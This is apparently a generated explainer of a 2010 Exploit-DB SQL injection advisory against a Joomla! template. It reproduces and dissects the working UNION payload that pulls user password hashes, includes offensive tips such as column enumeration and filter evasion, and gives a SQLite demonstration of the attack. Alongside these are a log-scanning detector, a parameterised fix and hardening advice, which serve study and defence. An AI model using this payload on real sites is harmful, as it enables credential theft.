Understanding Joomla! Bamboo Simpla Admin Template SQL Injection (CVE-2009-4877)

What this paper is
This paper details a remote SQL injection vulnerability reported in the Joomla! Bamboo Simpla Admin Template. The injection point is the id parameter of a com_content article URL; by manipulating it an attacker can extract usernames and password hashes from the jos_users table. The advisory itself (reproduced verbatim at the end of this page) consists only of a URL template and a payload; it does not explain how the template changes the handling of that parameter, so the attribution to the template rather than to the core com_content component rests on the author's word.
Simple technical breakdown
The vulnerability lies in how the id parameter is handled. When its value is concatenated into the SQL text instead of being cast to an integer or bound as a query parameter, an attacker can inject SQL. The exploit uses a UNION SELECT to append the attacker's own query (retrieving usernames and passwords) to the legitimate article query, so the database returns the attacker's rows alongside, or in place of, the article that was requested.
Complete code and payload walkthrough
The provided "code" is not executable code in the traditional sense but a crafted URL and an SQL injection payload.

URL Structure:

http://server/P47H/index.php?option=com_content&view=article&id={EV!L EXPLO!T}

- http://server/P47H/index.php: the base URL of the Joomla! installation. P47H is the author's placeholder for the actual installation path.
- option=com_content&view=article: requests the article view of the com_content component, which is part of the Joomla! core content management system.
- id={EV!L EXPLO!T}: the critical part. The id parameter is meant to select which article to display; {EV!L EXPLO!T} is the author's placeholder for the injected SQL.

SQL Injection Payload:

-666/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--

Breaking this payload down:

- -666: an id that matches no article, so the original SELECT returns no rows and the only rows the page renders come from the injected UNION SELECT.
- /**/: an inline SQL comment. MySQL treats it as whitespace, so it works as a space while defeating naive filters that look for literal spaces.
- union: combines the result set of the original SELECT with the attacker's SELECT.
- select: starts the attacker's query.
- 1,2,concat(username,0x3a,password),4,5,6,7,8: the column list. A UNION requires both SELECTs to return the same number of columns, so the original query evidently selects eight. The constants 1,2,4,5,6,7,8 are fillers; the third position, presumably a column the article template renders, carries the extracted data.
  - concat(): the MySQL string concatenation function.
  - username: the username column of jos_users.
  - 0x3a: the hexadecimal literal for the colon character (:), used as a separator without needing quote characters that a filter might block.
  - password: the password column of jos_users. In Joomla! 1.5 this holds a salted MD5 hash in the form hash:salt, not a cleartext password.
  The expression yields strings like admin:<hash>:<salt>.
- /**/from/**/jos_users: the table to read from. jos_users, with the default jos_ table prefix, is the standard Joomla! 1.5 user table.
- --: a MySQL line comment that discards the remainder of the original query (for example a trailing ORDER BY or LIMIT clause) so the statement stays syntactically valid. MySQL only honours -- when it is followed by whitespace or the end of the statement, which is why public payloads often end in "-- -" or "--+" (the + decodes to a space in a URL).

Mapping list:

- http://server/P47H/index.php?option=com_content&view=article&id=: base URL and parameters that trigger article viewing.
- -666: non-existent id that empties the original result set.
- /**/: inline SQL comment used as a space to bypass filters.
- union: SQL keyword combining the two result sets.
- select: SQL keyword starting the attacker's query.
- 1,2,4,5,6,7,8: filler columns matching the original query's column count.
- concat(username,0x3a,password): extracts and formats username and password hash from jos_users.
- from jos_users: the target table.
- --: SQL comment terminating the original query.
Practical details for offensive operations teams
- Required Access Level: Low. This is a remote, unauthenticated vulnerability. An attacker does not need any prior access to the Joomla! site.
- Lab Preconditions:
  - A vulnerable Joomla! installation with the Bamboo Simpla Admin Template installed.
  - Knowledge of the Joomla! installation path and the base URL.
  - A target Joomla! database with at least one user account in the jos_users table.
- Tooling Assumptions:
  - A web browser for manual testing or crafting requests.
  - A web proxy (e.g., Burp Suite, OWASP ZAP) to intercept and modify requests.
  - An SQL injection tool such as sqlmap can automate the column-count enumeration and extraction, but matching this exact payload shape (comments for spaces, negative id) may require manual configuration of its prefix and tamper options.
- Execution Pitfalls:
  - WAF/IDS Evasion: using /**/ in place of spaces is a common, dated evasion. Any WAF that normalises comments before matching will still catch it.
  - Incorrect Column Count: if the original com_content query selects a number of columns other than 8, the UNION SELECT fails. The count must be enumerated first, for example by appending UNION SELECT NULL,... with one more NULL per attempt until the error disappears.
  - Database Specific Syntax: concat() and the 0x3a literal are MySQL idioms; against another database engine the payload needs rewriting.
  - Output Encoding: the extracted string is rendered inside the article template, so it may be HTML-encoded or truncated before it appears in the browser.
  - Path Discovery: identifying the correct installation path (P47H in the advisory) is a prerequisite.
- Expected Telemetry:
  - Web Server Logs: GET requests to index.php with option=com_content where the id parameter is non-numeric and contains SQL keywords (union, select, concat, from, --), possibly URL-encoded.
  - Database Logs: if the general query log or equivalent is enabled, queries that deviate from normal article retrieval. Such logging is uncommon on standard web application setups.
  - WAF/IDS Alerts: a WAF, if present, may flag the request as a SQL injection attempt.
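To turn the web-server-log telemetry above into a concrete check, here is an added example (not part of the advisory or of Joomla!) that scans access-log lines for the request shape used by this exploit. The log lines are constructed for the example, using RFC 5737 addresses; the indicator regexes are a starting point to tune rather than a complete SQL injection signature set. The scanner undoes the two evasions the payload relies on, URL encoding and /**/ in place of spaces, before matching, and requires "union" to be followed by "select" so ordinary search terms do not fire.

```python
"""Access-log scan for the com_content id-parameter injection pattern.
Added example: log lines are constructed; indicator list is a tunable assumption."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each indicator is matched against the normalised parameter value.
INDICATORS = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("credential-table", re.compile(r"\bjos_users\b")),
    ("concat-call", re.compile(r"\bconcat\s*\(")),
    ("comment-terminator", re.compile(r"--\s*$")),
]

# Constructed sample: two benign requests, then the advisory's payload raw and
# URL-encoded with mixed case and %2F%2A%2A%2F for the /**/ spacers.
SAMPLE_LOG = """\
192.0.2.10 - - [03/Jan/2010:09:10:02 +0000] "GET /joomla/index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
192.0.2.10 - - [03/Jan/2010:09:12:41 +0000] "GET /joomla/index.php?option=com_search&searchword=union+station+select+committee HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jan/2010:09:15:00 +0000] "GET /joomla/index.php?option=com_content&view=article&id=-666/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users-- HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jan/2010:09:15:09 +0000] "GET /joomla/index.php?option=com_content&view=article&id=-1%2F%2A%2A%2FUnIoN%2F%2A%2A%2FSeLeCt%2F%2A%2A%2F1%2C2%2Cconcat%28username%2C0x3a%2Cpassword%29%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""


def normalize(value):
    """Undo the evasions before matching: a second URL-decode for double
    encoding, lower-casing, and inline comments collapsed to one space so the
    keyword regexes see real word boundaries."""
    value = unquote(value).lower()
    value = re.sub(r"/\*.*?\*/", " ", value)
    return re.sub(r"\s+", " ", value).strip()


def inspect_query(target):
    """Return [(param, [indicators], normalised_value)] for suspicious parameters."""
    findings = []
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            value = normalize(raw)
            tags = [tag for tag, rx in INDICATORS if rx.search(value)]
            if tags:
                findings.append((name, tags, value))
    return findings


def scan_log(text):
    """Parse combined-format lines and return one record per flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = inspect_query(m["target"])
        if findings:
            hits.append({"ip": m["ip"], "ts": m["ts"],
                         "status": m["status"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        for param, tags, value in hit["findings"]:
            print(f'{hit["ip"]} {hit["ts"]} param={param} {tags}\n    {value}')
```

Because normalisation happens before matching, both the raw and the percent-encoded, mixed-case variants produce the same four indicators, while the com_search request containing the words "union" and "select" separately is left alone. In production the same logic belongs in the WAF or SIEM rule rather than a batch script, and the indicator list should be extended to the other comment styles and the ORDER BY column-count probes.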
Where this was used and when
- Context: the advisory was published on Exploit-DB on 2010-01-03 (paper 10971) and the issue is tracked as CVE-2009-4877. The jos_ table prefix and the option=com_content&view=article URL form place it in the Joomla! 1.5 generation.
- Timeframe: the exploit was relevant around 2010 and for as long as affected sites remained on the vulnerable template. Given its age it has no value against current, patched installations, but unmaintained legacy Joomla! 1.5 sites that still run the template remain exposed.
Defensive lessons for modern teams
- Input Validation and Sanitization: the primary defense. All user-supplied input, especially values used in database queries, must be validated before use. For an article id, which is always an integer, casting the value to int before it reaches the query removes this injection entirely. In general this means:
  - Using parameterized queries or prepared statements to separate SQL code from data.
  - Escaping special characters that have meaning in SQL, as a secondary measure where binding is not possible.
  - Allow-listing acceptable input types, formats and ranges rather than trying to block known-bad strings.
- Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns, including SQL injection attempts. Keep WAF rules updated.
- Regular Patching and Updates: Keep Joomla! core, extensions, and templates updated to the latest versions. Vendors typically release patches for known vulnerabilities.
- Principle of Least Privilege: Ensure that the database user account used by the web application has only the necessary permissions. It should not have administrative rights or the ability to drop tables, for example.
- Error Handling: Configure error reporting to not reveal detailed database error messages to end-users, as these can provide attackers with valuable information about the database structure and vulnerabilities.
- Security Audits and Code Reviews: Regularly audit web application code for potential vulnerabilities, especially in areas handling user input and database interactions.
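The following is an added example, not code from the advisory or from Joomla!, that models on an in-memory SQLite database both the UNION extraction explained in the payload walkthrough and the parameterised fix recommended in the defensive lessons. The two tables, their rows and the hash value are constructed for the example; the eight-column query shape follows the advisory's payload; and because SQLite has no 0x string literal, "username || ':' || password" stands in for MySQL's concat(username,0x3a,password). The /**/ spacers and the trailing -- are kept as in the advisory, since SQLite accepts both comment forms.

```python
"""UNION-based extraction through an unsanitised id parameter, the column-count
probe needed to make it work, and the integer-cast plus parameter-binding fix.
Added example on SQLite; schema and data are constructed stand-ins."""
import sqlite3

# The advisory's payload with only the MySQL-specific concat() translated.
PAYLOAD = ("-666/**/union/**/select/**/1,2,username||':'||password,4,5,6,7,8"
           "/**/from/**/jos_users--")

ARTICLE_COLUMNS = "id,title,alias,introtext,state,catid,created,hits"  # 8 columns


def make_db():
    """Constructed stand-in for a Joomla! 1.5 schema: one article, one admin user."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE jos_content (id INTEGER PRIMARY KEY, title TEXT, alias TEXT,
            introtext TEXT, state INTEGER, catid INTEGER, created TEXT, hits INTEGER);
        INSERT INTO jos_content VALUES
            (1, 'Welcome', 'welcome', 'Hello world', 1, 1, '2010-01-03', 42);
        CREATE TABLE jos_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO jos_users VALUES
            (62, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99:Zm9vYmFyYmF6cXV4');
    """)
    return con


def article_vulnerable(con, article_id):
    """The flaw: the id value is pasted into the SQL text, so SQL inside it runs."""
    sql = f"SELECT {ARTICLE_COLUMNS} FROM jos_content WHERE id = {article_id}"
    return con.execute(sql).fetchall()


def enumerate_columns(con, query, limit=20):
    """The 'Incorrect Column Count' pitfall: a UNION only works when both SELECTs
    have the same width.  Probe with UNION SELECT NULL,... adding one NULL per
    round until the engine stops rejecting the statement."""
    for n in range(1, limit + 1):
        probe = "-666 UNION SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            query(con, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def article_safe(con, article_id):
    """The fix: reject anything that is not an integer, then bind the value as
    a parameter so the driver never lets it be parsed as SQL."""
    try:
        article_id = int(article_id)
    except (TypeError, ValueError):
        return []
    sql = f"SELECT {ARTICLE_COLUMNS} FROM jos_content WHERE id = ?"
    return con.execute(sql, (article_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("column count:", enumerate_columns(db, article_vulnerable))
    print("vulnerable  :", article_vulnerable(db, PAYLOAD))
    print("hardened    :", article_safe(db, PAYLOAD))
```

Against the vulnerable function the payload returns a single row whose third column is admin:<hash>:<salt>, exactly the data the advisory targets; the same payload against article_safe returns nothing because it never survives the integer cast, and even without that cast the bound parameter would only ever be compared against id as a value. Either control alone closes the hole; using both is the least-privilege habit worth keeping.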
ASCII visual (if applicable)
This vulnerability is a direct manipulation of a web request to the server. An ASCII visual can illustrate the flow of the malicious request.
+------------+     +-------------+     +------------------+     +-------------+
| Attacker's |---->| Web Browser |---->| Web Server       |---->| Joomla!     |
| Machine    |     | / Proxy     |     | (Vulnerable App) |     | Application |
+------------+     +-------------+     +------------------+     +-------------+
      ^          Malicious GET request (with SQLi payload)             |
      |                                                                v
      |                                                       +-------------------+
      |                                                       | Database Server   |
      |                                                       | (jos_users table) |
      |                                                       +-------------------+
      |                      Returns attacker's data                   |
      +----------------------------------------------------------------+

Source references
- Paper ID: 10971
- Paper Title: Joomla! Component Bamboo Simpla Admin Template - SQL Injection
- Author: R3d-D3V!L
- Published: 2010-01-03
- Paper URL: https://www.exploit-db.com/papers/10971
- Raw URL: https://www.exploit-db.com/raw/10971
Original Exploit-DB Content (Verbatim)
[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: Joomla Bamboo Simpla Admin Template suffer from REMOTe sql injection
[~] Vendor: .joomlabamboo.com
[?] Software:Joomla Bamboo Simpla Admin Template
[-]
[?] author: ((R3d-D3v!L))
[?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY
[?] contact: N/A
[-]
[?] Date: 3.Jan.2010
[?] T!ME: 09:15 am GMT
[?] Home: WwW.xP10.ME
[?]
[?]
[-]??????????????????????{DEV!L'5 of SYST3M}??????????????????
[*] Err0r C0N50L3:
http://server/P47H/index.php?option=com_content&view=article&id= {EV!L EXPLO!T}
[~] {EV!L EXPLO!T}:
-666/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
N073:
REAL RED DEV!L W@S h3r3 LAMERZ
GAZA !N our hearts !
[~]-----------------------------{((Angela Bennett))}---------------------------------------
[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ
[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4
[?]spechial SupP0RT: MY M!ND ;) & ((OFFsec))
[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t))
[~]spechial FR!ND: 74M3M
[~] !'M 4R48!4N 3XPL0!73R.
[~]{[(D!R 4ll 0R D!E)]};
[~]---------------------------------------------------------------------------------------------